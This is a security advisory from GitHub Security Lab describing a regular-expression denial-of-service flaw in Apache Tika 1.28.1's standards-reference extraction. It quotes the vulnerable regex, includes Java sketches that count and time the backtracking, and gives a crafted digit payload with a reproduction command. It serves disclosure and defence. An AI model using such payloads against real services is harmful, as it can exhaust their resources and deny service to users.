Coordinated Disclosure Timeline

Summary

Apache Tika up to and including version 1.28.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles standard references in text files. A specially crafted file may trigger catastrophic backtracking, so that parsing time grows exponentially with the length of the input.

Product

Apache Tika

Tested Version

1.28.1

Details

Issue: Regular Expression Denial of Service (ReDoS) in StandardsText.java (GHSL-2022-021)

Apache Tika uses the following regular expression to match uppercase standard headers when extracting standard references from a text file using StandardsText:

private static final String REGEX_HEADER =
        "(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}";

Note the nested repetition in (\\d+\\.?)*. Because \\. is optional, a long run of digits can be consumed either by the inner \\d+ or by further iterations of the outer *, so the same run can be split between the two in many different ways. If the rest of the expression fails to match after such a run, the regex engine backtracks through all of these alternatives, which takes exponential time [1].
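To get a feel for the size of that search space, the following is a minimal sketch that counts the ways a run of digits can be cut into consecutive non-empty chunks, each chunk standing for one iteration of (\\d+\\.?)* that matched digits only. It is a simplified model, not Tika code and not the actual java.util.regex implementation; the class and method names are hypothetical, and the recursion is deliberately naive to mirror an engine that retries every alternative.

```java
class BacktrackCountSketch {
    // Hypothetical helper: counts the ways to cut a run of `digits` digits
    // into consecutive non-empty chunks. Each chunk models one iteration of
    // (\d+\.?)* in which the optional dot is absent.
    static long countSplits(int digits) {
        if (digits == 0) {
            return 1; // nothing left to split: one complete way
        }
        long total = 0;
        // Choose the length of the first chunk, then split the remainder.
        for (int first = 1; first <= digits; first++) {
            total += countSplits(digits - first);
        }
        return total;
    }

    public static void main(String[] args) {
        for (int n = 5; n <= 20; n += 5) {
            System.out.println(n + " digits: " + countSplits(n) + " splits");
        }
    }
}
```

In this model countSplits(5) returns 16 and countSplits(10) returns 512, that is 2^(n-1) for a run of n digits, so every additional digit doubles the number of alternatives a backtracking matcher may have to try before giving up.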

This regex is used in StandardsText.findHeaders, which in turn is called in StandardsText.extractStandardReferences. The latter is used by the StandardsExtractingContentHandler class, which means that a text file being parsed using this handler and containing a specific payload may exploit the ReDoS vulnerability.

To demonstrate the exploitation, the provided StandardsExtractionExample can be used as follows:

$ cat /tmp/test/test.txt
2.9999999999999999999999999999999

$ cd tika-examples

$ mvn compile exec:java -Dexec.mainClass="org.apache.tika.example.StandardsExtractionExample" -Dexec.args="/tmp/test"

The time needed to parse the file grows exponentially with the length of the sequence of 9s in the input file test.txt.

Note that JDK 9 introduced important mitigations for this problem, so to reproduce the issue with the above example, it must be run with JDK 8 or earlier.
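The same behavior can be observed without building Tika. The following is a minimal standalone sketch that applies the pattern quoted earlier through java.util.regex and times it against payloads of increasing length. The class name, the payload and hasHeader helpers, and the use of Matcher.find() are assumptions made for illustration and are not taken from the Tika sources. Input lengths are kept small so that the program finishes quickly even on JDK 8; on newer JDKs the growth may not be visible at all.

```java
import java.util.Arrays;
import java.util.regex.Pattern;

class HeaderRegexTimingSketch {
    // Pattern copied from the REGEX_HEADER constant quoted in this advisory.
    static final Pattern HEADER = Pattern.compile(
            "(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}");

    // Hypothetical helper: builds "2." followed by `nines` copies of '9'.
    // Uses Arrays.fill instead of String.repeat to stay Java 8 compatible.
    static String payload(int nines) {
        char[] run = new char[nines];
        Arrays.fill(run, '9');
        return "2." + new String(run);
    }

    // Assumption: the pattern is applied as a search with Matcher.find().
    static boolean hasHeader(String text) {
        return HEADER.matcher(text).find();
    }

    public static void main(String[] args) {
        // A well-formed uppercase header matches immediately.
        System.out.println("header found: " + hasHeader("1.2 SCOPE"));

        // The payload never matches, so the engine has to exhaust its options.
        for (int n = 12; n <= 20; n += 2) {
            String input = payload(n);
            long start = System.nanoTime();
            boolean found = hasHeader(input);
            long micros = (System.nanoTime() - start) / 1_000;
            System.out.println(n + " nines: found=" + found + ", " + micros + " us");
        }
    }
}
```

Absolute timings depend on the machine and the JDK, so the numbers are only meaningful relative to each other within a single run.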

Impact

This issue may lead to a denial of service by resource consumption.

Resources

[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
[2] https://github.com/google/re2j

CVE

Credit

This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).
The incomplete fix was discovered and reported by the CodeQL team member @atorralba (Tony Torralba) and by @jarlob (Jaroslav Lobačevski) from GitHub Security Lab.

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2022-021 in any communication regarding this issue.